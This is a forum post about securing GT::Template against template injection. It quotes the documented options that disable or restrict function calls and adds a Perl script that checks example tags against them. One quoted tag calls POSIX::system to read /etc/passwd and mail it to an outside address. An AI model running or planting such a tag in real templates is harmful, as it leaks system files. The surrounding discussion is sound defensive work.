Quote:
if you were fearful of editors doing this, then you must have picked the wrong editors :)
And admins should trust only themselves. Security risks should be lowered as much as possible.
Quote:
so how about this... <%POSIX::system("cat /etc/passwd | mail gthreads@gmail.com")%>
Uhm, yes that would be serious. But you can do this only when logged in as admin.
If I implement a partner template editor interface, I can use the function call limiting features of GT::Template.
So thanks to foreseeing GT developments, function calls can be limited with a regexp, and furthermore function calls can be disabled.
See the GT::Template docs:
http://www.gossamer-threads.com/...e.html#parse_options
Quote:
disable => { ... } This can be used to disable certain GT::Template functionality. To disable a particular feature, the hash reference passed to disable should contain a feature_name with a 1 value, unless otherwise indicated. Feature names are as follows:
functions
This can be used to disable Package::function calls, such as <%Some::Package::function%>. Note, however, that this does _not_ disable aliased function calls (see below).
function_args
This disables any function calls that specify arguments - for instance, <%Some::Package::function(1)%>. Note that this does _not_ disable passing arguments to aliased function calls (see below).
function_restrict
This can be used to restrict function calls by limiting the available functions. It takes a regular expression as an argument, which will be tested against the fully qualified function name - any function that does not match the regular expression will not be called. For example, to only allow functions in 'Package::One' and 'Second::Package' to be called, you could use:
function_restrict => '^(?:Package::One|Second::Package)::\w+$'
Like the above options, this does not restrict aliased function calls.
coderefs_args
This can be specified to disable the calling of code reference variables with arguments. Tags such as <%coderefname%> and <%coderefname()%> will be allowed, but <%coderefname(1)%> will not.
alias_args
This option can be used to disable the passing of arguments to aliased function calls (see below).
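As an added illustration (not Gossamer Threads code and not part of the original post), here is a stand-alone Perl model of how the documented functions, function_args and function_restrict options decide whether a Package::function tag gets called, run over the tags quoted in this thread. The %disable hash uses the documented key names with the docs' own example regexp; check_tag is my own helper, not a GT::Template method, and the parse call shape at the end is an assumption to be checked against the parse_options docs linked above.

```perl
#!/usr/bin/perl
# Added example: models the documented 'disable' semantics; it is not GT::Template itself.
use strict;
use warnings;

# The hashref you would hand to the 'disable' parse option (documented key names).
my %disable = (
    function_args     => 1,   # <%Pkg::fn(1)%> is refused outright
    function_restrict => '^(?:Package::One|Second::Package)::\w+$',
);

# Decide whether a single <%...%> tag would be called under %disable.
# Returns ('allowed'|'blocked', reason). Aliased calls are NOT covered by these
# options, exactly as the docs note, so they are not modelled here.
sub check_tag {
    my ($tag, $opt) = @_;
    (my $body = $tag) =~ s/^<%\s*|\s*%>$//g;          # strip the <% %> delimiters
    # A fully qualified call has at least one '::' in the name, optional (args).
    if ($body =~ /^((?:\w+::)+\w+)\s*(\((.*)\))?$/) {
        my ($name, $has_parens, $args) = ($1, defined $2, defined $3 ? $3 : '');
        return ('blocked', 'functions disabled')
            if $opt->{functions};
        return ('blocked', "arguments not allowed: $name")
            if $opt->{function_args} && $has_parens && length $args;
        return ('blocked', "$name does not match function_restrict")
            if defined $opt->{function_restrict}
               && $name !~ /$opt->{function_restrict}/;
        return ('allowed', $name);
    }
    # Plain variables, coderefs and aliases fall outside these three options.
    return ('allowed', 'not a Package::function call');
}

my @tags = (
    '<%POSIX::system("cat /etc/passwd | mail gthreads@gmail.com")%>',  # from the thread
    '<%Package::One::format_date%>',      # constructed: matches the restrict regexp
    '<%Package::One::format_date(1)%>',   # constructed: matches, but carries an argument
    '<%Some::Package::function%>',        # from the docs: outside the allowed packages
    '<%title%>',                          # constructed: an ordinary template variable
);
for my $t (@tags) {
    my ($verdict, $why) = check_tag($t, \%disable);
    printf "%-8s %s  (%s)\n", $verdict, $t, $why;
}

# Assumed call shape for the real thing (verify against the parse_options docs):
#   GT::Template->parse($template_file, \%vars, { disable => \%disable });
```

With this hash the POSIX::system tag is refused twice over (it carries arguments and is outside the allowed packages), so a partner editor could not use it even though the same tag would run for the admin; aliases still need the separate alias_args option.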
Best regards,
Webmaster33